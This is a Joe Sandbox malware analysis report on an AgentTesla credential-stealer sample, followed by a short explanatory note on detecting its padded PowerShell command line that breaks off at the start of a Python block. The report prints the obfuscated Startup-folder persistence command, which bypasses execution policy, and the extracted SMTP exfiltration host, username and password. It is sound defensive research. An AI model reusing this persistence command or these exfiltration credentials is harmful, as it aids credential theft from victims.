Windows Analysis Report
PO-095325.scr.exe

Overview

General Information

Sample name: PO-095325.scr.exe
Analysis ID: 1428828
MD5: 93f87d1e11c67dbc47ff98369811e826
SHA1: b407b411806659a874ce20d38b62c891703a4bce
SHA256: 16043cbb08a362ab425145ded9447bcc382c2b9c9eb3b570704edabbe4276fea
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-095325.scr.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\PO-095325.scr.exe" MD5: 93F87D1E11C67DBC47FF98369811E826)
    • powershell.exe (PID: 5500 cmdline: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "zt22@qlststv.com", "Password": "28#75@ts76#V1F8h"}
Yara matches in memory dumps (Source | Rule | Description | Author):
  • 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
  • 00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in unpacked PEs (Source | Rule | Description | Author):
  • 4.2.RegAsm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 4.2.RegAsm.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
  • 4.2.RegAsm.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
  • 4.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
    Matched strings:
    • 0x33e4d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
    • 0x33ebf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
    • 0x33f49:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
    • 0x33fdb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
    • 0x34045:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
    • 0x340b7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
    • 0x3414d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
    • 0x341dd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
  • 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', CommandLine: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? 
??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-095325.scr.exe", ParentImage: C:\Users\user\Desktop\PO-095325.scr.exe, ParentProcessId: 4424, ParentProcessName: PO-095325.scr.exe, ProcessCommandLine: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', ProcessId: 5500, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1268, ProcessName: svchost.exe
                    No Snort rule has matched

                    AV Detection

Source: PO-095325.scr.exe | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: 4.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "zt22@qlststv.com", "Password": "28#75@ts76#V1F8h"}
Source: PO-095325.scr.exe | ReversingLabs: Detection: 28%
Source: PO-095325.scr.exe | Joe Sandbox ML: detected
Source: PO-095325.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: PO-095325.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\AtllasRunp\AtllasRunp\obj\Debug\Bienvenida.pdb source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2056029725.0000000008194000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2053643974.000000000725A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb@70s/ source: powershell.exe, 00000002.00000002.2055885190.000000000815A000.00000004.00000020.00020000.00000000.sdmp

                    Networking

Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: RegAsm.exe, 00000004.00000002.4466181997.000000000338E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000002.00000002.2055731933.0000000008132000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: svchost.exe, 00000005.00000002.3638291875.00000214424A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2047492767.0000000004BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: RegAsm.exe, 00000004.00000002.4466181997.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipif8
Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/T4
Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/p
Source: RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.2028768858.00000214421F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/sam210723/goesrecv-monitor/releases/latest
Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.5.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://vksdr.com/goesrecv-monitor
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: PO-095325.scr.exe, KeyHook.cs | .Net Code: StartListening
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_028A4560
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_028ACD3C
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_028AF5A8
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_028AF5B8
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FB7718
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FB12B7
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FBCF50
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FB35BC
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FBCF3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01604AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01603EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_016041F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E6B7B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E665F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E60040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E68458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E6D428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E6D418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E6E11F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_06E68B40
Source: PO-095325.scr.exe, 00000000.00000002.2028292789.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBienvenida.exe6 vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000000.2007786745.000000000053A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameESET.exe, vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBienvenida.exe6 vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1f940a0d-a27b-4ffe-9f6f-6b985da4c6d6.exe4 vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamegoesrecv.dllB vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegoesrecv.dllB vs PO-095325.scr.exe
Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1f940a0d-a27b-4ffe-9f6f-6b985da4c6d6.exe4 vs PO-095325.scr.exe
Source: PO-095325.scr.exe | Binary or memory string: OriginalFilenameESET.exe, vs PO-095325.scr.exe
Source: PO-095325.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: PO-095325.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PO-095325.scr.exe.5290000.3.raw.unpack, ConstellationPanel.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, ConstellationPanel.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-095325.scr.exe.5290000.3.raw.unpack, Symbols.cs | Base64 encoded string: [omitted]
Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, Symbols.cs | Base64 encoded string: [omitted]
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/11@2/3
Source: C:\Users\user\Desktop\PO-095325.scr.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-095325.scr.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvbxtp5v.tvb.ps1
Source: PO-095325.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO-095325.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe, 00000004.00000002.4466181997.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO-095325.scr.exe | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Users\user\Desktop\PO-095325.scr.exe "C:\Users\user\Desktop\PO-095325.scr.exe"
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
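The process tree above shows the two behaviours that matter for detection. The sample starts powershell.exe with -ExecutionPolicy Bypass and a Copy-Item that copies itself into the user's Startup folder as command-line.exe, and the command line is padded between every character with characters the report renders as "?", which defeats naive string matching. It then starts RegAsm.exe with no arguments; that process is where the credential access further down (Firefox profiles.ini, the Outlook profile key, vaultcli.dll) is observed. The following is an added example, not part of the Joe Sandbox report, of how a detection rule should treat these rows: strip the padding before matching, then test for a Copy-Item whose destination is a Startup folder and for an argument-less RegAsm.exe started by a parent outside the OS and program directories. It assumes the padding consists of non-printing Unicode control or format characters (the report does not show which code points were used), treats runs of three or more "?" as the rendered form of that padding, and runs on constructed sample command lines built from the paths in the rows above.

```python
import re
import unicodedata
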